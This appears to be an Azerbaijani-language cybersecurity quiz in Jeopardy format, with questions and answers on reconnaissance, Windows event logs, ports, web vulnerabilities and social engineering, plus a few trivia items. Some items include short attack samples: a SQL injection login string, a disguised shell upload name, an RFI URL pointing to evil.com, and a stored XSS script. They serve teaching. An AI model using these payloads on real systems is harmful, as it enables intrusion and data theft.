Linux
SIEM&LOG
RANDOM
WEB ATTACKS
NETWORK
100

Pentester olaraq şirkət haqqında LinkedIn, rəsmi sayt və sosial şəbəkələrdən məlumat toplayırsan. Bu hansi Recon növüdür?

Passive Reconnaissance

100

Log Name: Security

Event ID: 4625

Account Name: Administrator

Source IP: 192.168.1.50

Bu log ilk olaraq hansı hadisəni göstərir?

Uğursuz giriş cəhdi  

100

RDP protokolunun portu neçədir?

3389

100

GET /login.php HTTP/1.1

Host: target.local

Username: admin' --

Password: 123456

Bu giriş cəhdi ilk olaraq hansı zəifliyi yoxlamağa çalışır?

SQL INJECTION

100
PORT      STATE SERVICE 
53/udp    open  domain

Bu port əsasən hansı xidmətə aiddir?

DNS

200

Bu skript nə vaxt avtomatik icra olunacaq?

student@kali:~$ crontab -l

0 2 * * * /home/student/backup.sh

Hər gün saat 2də

200


Event ID: 4624 
Logon Type: 10 
Account: Administrator 
Source IP: 10.10.10.5

Bu istifadəçi sistemə hansı üsulla daxil olub?

RDP

200

Şirkətin əməkdaşı "Maaş Siyahısı 2026.xlsx" adlı e-mail alır. Faylı açdıqdan bir neçə saniyə sonra kompüterində qəribə proseslər başlayır.

Bu hücumun istifadə etdiyi əsas sosial mühəndislik üsulu nədir?

Phishing

200

https://target.local/index.php?page=home.php

Bu URL-i görən pentester ilk hansı zəifliyi yoxlamağı düşünər?

LFI

200

TCP Connection


Client  -------- SYN -------->


Server  <------ SYN, ACK -----


Client  -------- ACK -------->

Bu proses necə adlanır?

TCP Three-Way Handshake

300

Haker hədəf işçiyə içində zərərli kod olan bir e-mail göndərirsə, bu Cyber Kill Chain modelinin hansı mərhələsidir?

Delivery

300

DDOS,SQL INJECTION,XSS kimi hücumların qarşısını almaq üçün hansı təhlükəsizlik aləti quraşdırılır?

WAF

300

Hücumçu şirkətin resepsiyasına zəng edir və özünü İT şöbəsinin əməkdaşı kimi təqdim edir.

"Sistemlər yenilənir, zəhmət olmasa istifadəçi adınızı və birdəfəlik giriş kodunuzu deyin."

Əməkdaş məlumatları paylaşır.

Bu hücum növü necə adlanır?

Vishing 

300

POST /upload.php HTTP/1.1

Filename: shell.php.jpg

Content-Type: image/jpeg

Hücumçu bu faylı niyə shell.php.jpg adı ilə yükləməyə çalışır?

Serverin fayl uzantısı yoxlamasını bypass etməyə çalışır.

300

nmap -sV əmri nə üçün istifadə olunur?

Xidmətlərin versiyalarını müəyyən etmək üçün

400
student@kali:~$ sudo -l
Pentester bu əmri niyə ilk işlədən əmrlərdən biri hesab edir?

İstifadəçinin sudo ilə hansı əmrləri işlədə biləcəyini öyrənmək üçün

400

Task Schedular-da yaratdığımız task ilə edilən girişin logon type-ı neçədir?

4

400

Dünyanın ən kiçik ölkəsi hansıdır?

Vatikan

400

https://target.az/index.php?page=http://evil.com/shell.txt 

Server uzaqdakı faylı icra edir.

Bu hansı zəiflikdir?

RFI

400

nmap -O 192.168.1.10 əmri nə üçün istifadə olunur?

Əməliyyat sisteminin müəyyən edilməsi üçün

500

Pentest zamanı cat /etc/passwd faylını oxuya bildiniz, lakin /etc/shadow faylını oxuya bilmədiniz. Bunun səbəbi nə ola bilər?

/etc/shadow yalnız root istifadəçisi tərəfindən oxuna bilər

500
Windowsda loglar hansı qovluqda saxlanılır?

C:\\Windows\System32\winevt

500

💍 + 🍀 bu simvollar hansı Azərbaycan filmini göstərir?

Bəxt üzüyü

500

İki istifadəçi eyni forumdan istifadə edir.

İstifadəçi A aşağıdakı şərhi yazır:

<script>alert("Hello")</script>

Bir neçə saat sonra istifadəçi B mövzunu açan kimi eyni popup görünür.

Bu hansı XSS növüdür?

Stored XSS

500

Pentester eyni hədəfi iki fərqli üsulla skan edir.

Birinci scan 30 saniyəyə, ikinci scan isə 6 dəqiqəyə tamamlanır.

Uzun çəkən scan böyük ehtimalla hansı scan növüdür?

UDP scan

M
e
n
u